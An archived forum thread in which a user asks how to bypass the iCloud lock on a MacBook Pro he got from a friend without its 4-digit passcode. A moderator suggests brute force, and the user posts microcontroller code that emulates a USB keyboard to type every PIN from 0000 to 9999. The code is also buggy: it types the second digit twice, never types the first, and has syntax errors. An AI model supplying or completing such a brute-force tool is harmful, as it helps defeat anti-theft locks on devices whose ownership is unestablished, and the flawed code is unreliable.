• This is a read only backup of the old Emudevs forum. If you want to have anything removed, please message me on Discord: KittyKaev

Mac book pro questin .

_Ikester_

Exalted Member
Mac book pro question .

Ok i got a mac book pro from one of my friends a couple day's ago. This has icloud pass on it. And we don't have the 4 digit pass code.

Normally i would use startup commands to access the pc but icloud when it's on locks keyboard command functions . So i cant access laptop using command line. I have been searching for a couple day's trying to find a way to bypass icoud to no avail. Any ideas how to solve this. I have also pulled hard drive and replaced it to no avail. So i am putting original hard drive back in it as it has no problems as far as i can tell. Any ideas how to solve this ?
 
Last edited:

Kaev

Super Moderator
Passwords would be senseless, if you could just bypass them somehow.
You could try to bruteforce it.
 

_Ikester_

Exalted Member
Brut force was where i was heading i have the code from machack but im not sure how to install it to flash drive im still trying to figure that out.
Here is the code.
#include <usb_keyboard .h>
const int ledPin = 13;
int counter = 0;
int fakecounter = counter;
char pin[]="xxxx";
void setup() {
pinMode(ledPin, OUTPUT);
delay(10000);
}
void loop(){
keyboard_modifier_keys = 0;
if (counter < = 9999){
delay(8000);
digitalWrite(ledPin, LOW);
delay(5500);
digitalWrite(ledPin, HIGH);
sprintf(pin, "%04d", fakecounter);
Keyboard.press(pin[1]);
delay(450);
Keyboard.release(pin[1]);
delay(420);
Keyboard.press(pin[1]);
delay(398);
Keyboard.release(pin[1]);
delay(510);
Keyboard.press(pin[2]);
delay(421);
Keyboard.release(pin[2]);
delay(423);
Keyboard.press(pin[3]);
delay(430);
Keyboard.release(pin[3]);
delay(525);
Keyboard.press(KEY_ENTER);
delay(305);
Keyboard.release(KEY_ENTER);
}
//reached 4 digit PIN max value
if (counter > 9999){
for (int blinkies = 0; blinkies < 8; blinkies++) {
digitalWrite(ledPin, HIGH);
delay(20);
digitalWrite(ledPin, LOW);
delay(200);
}
delay(6000);
}
++counter;
fakecounter = counter;
}

Using this method it says can take upto a couple days.
But if the pass is a smaller number it could only take a few hours,
 
Last edited:
Top